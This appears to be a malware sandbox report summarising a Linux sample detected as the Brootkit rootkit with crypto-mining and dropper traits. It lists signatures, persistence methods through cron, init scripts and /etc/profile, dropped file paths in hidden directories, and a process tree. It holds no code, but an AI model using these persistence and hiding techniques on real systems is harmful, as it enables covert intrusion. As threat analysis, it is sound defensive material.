Sample-level signatures: Detected Linux Brootkit rootkit; Sample contains AV-related strings; Found strings related to Crypto-Mining; Found strings indicative of a multi-platform dropper.
Process-level signatures: Sample reads /proc/mounts (often used for finding a writable filesystem); Drops files in suspicious directories; Sample tries to persist itself using cron; Sample tries to persist itself using System V runlevels; Sample tries to persist itself using /etc/profile; Sets full permissions to files and/or directories; Sample deletes itself.
Dropped files shown in the graph: /tmp/.helpdd (ASCII), /etc/rc.local (ASCII), /etc/init.d/diskmanagerd (POSIX), /etc/profile.d/emacs.sh (Bourne-Again), /tmp/.../install.sh (Bourne-Again), /usr/lib/.../diskmanagerd (Bourne-Again), /tmp/.../brootkit.sh (Bourne-Again), /lib/libterminfo.so (Bourne-Again), /usr/include/.../brootkit.sh (Bourne-Again), plus 2 other malicious files.
Process tree shown in the graph: bash -> nohup -> bash -> ssh (x3); systemd -> lvm2-activation-generator -> install.sh (-> cp, chmod, rm); systemd -> systemd-fstab-generator; bash -> update-rc.d -> insserv, systemctl; bash -> nohup -> sh -> sh (many children); bash -> dd; several hundred further processes not listed here.